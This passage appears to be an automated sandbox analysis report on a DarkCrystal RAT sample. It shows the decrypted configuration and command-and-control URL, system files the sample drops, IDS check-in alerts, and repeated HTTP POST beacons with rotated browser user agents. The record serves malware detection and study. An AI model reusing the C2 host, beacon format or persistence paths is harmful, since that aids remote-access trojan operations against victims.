                            Source: 00000000.00000002.1808136284.000000001263C000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-e0MEoQzZAqT5aSFnG7OI","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
                            Source: 00000000.00000002.1808136284.000000001263C000.00000004.00000800.00020000.00000000.sdmpString decryptor: [["http://505905cm.n9shka.top/","imagePollLinuxCentral"]]
                            Source: PlZA6b48MW.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeDirectory created: C:\Program Files\Windows Multimedia Platform\dllhost.exeJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeDirectory created: C:\Program Files\Windows Multimedia Platform\5940a34987c991Jump to behavior
                            Source: PlZA6b48MW.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\py4wf331\py4wf331.pdb source: PlZA6b48MW.exe, 00000000.00000002.1749070482.000000000309B000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: em.pdb source: WtHZilDMhVnOIkoIfPBLn.exe, 00000038.00000002.2404697406.000000001B342000.00000004.00000020.00020000.00000000.sdmp

                            Spreading

                            barindex
                            Infects executable files (exe, dll, sys, html)
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeFile opened: C:\Users\user\AppData\LocalJump to behavior

                            Networking

                            barindex
                            Suricata IDS alerts for network traffic
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49739 -> 37.44.238.250:80
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49740 -> 37.44.238.250:80
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49738 -> 37.44.238.250:80
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49753 -> 37.44.238.250:80
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49735 -> 37.44.238.250:80
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49730 -> 37.44.238.250:80
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49805 -> 37.44.238.250:80
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49856 -> 37.44.238.250:80
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49769 -> 37.44.238.250:80
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49841 -> 37.44.238.250:80
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49998 -> 37.44.238.250:80
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:50016 -> 37.44.238.250:80
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:50020 -> 37.44.238.250:80
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:50019 -> 37.44.238.250:80
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:50018 -> 37.44.238.250:80
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:50017 -> 37.44.238.250:80
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49826 -> 37.44.238.250:80
                            Uses ping.exe to check the status of other devices and networks
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: Joe Sandbox ViewIP Address: 37.44.238.250 37.44.238.250
                            Source: Joe Sandbox ViewASN Name: HARMONYHOSTING-ASFR HARMONYHOSTING-ASFR
                            Source: global trafficHTTP traffic detected: POST /imagePollLinuxCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 505905cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /imagePollLinuxCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 505905cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /imagePollLinuxCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 505905cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /imagePollLinuxCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 505905cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /imagePollLinuxCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 505905cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /imagePollLinuxCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 505905cm.n9shka.topContent-Length: 336Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /imagePollLinuxCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 505905cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /imagePollLinuxCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 505905cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /imagePollLinuxCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 505905cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /imagePollLinuxCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 505905cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /imagePollLinuxCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 505905cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /imagePollLinuxCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 505905cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /imagePollLinuxCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 505905cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /imagePollLinuxCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 505905cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /imagePollLinuxCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 505905cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /imagePollLinuxCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 505905cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /imagePollLinuxCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 505905cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: global trafficDNS traffic detected: DNS query: 505905cm.n9shka.top
                            Source: unknownHTTP traffic detected: POST /imagePollLinuxCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 505905cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 Jan 2025 18:22:12 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 Jan 2025 18:22:16 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 Jan 2025 18:22:22 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 Jan 2025 18:22:26 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 Jan 2025 18:22:49 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 Jan 2025 18:22:49 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 Jan 2025 18:22:58 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 Jan 2025 18:23:01 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 Jan 2025 18:23:09 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 Jan 2025 18:23:12 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 Jan 2025 18:23:15 GMTContent-Type: text/html; charset=UTF-8Content-Length: 213Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
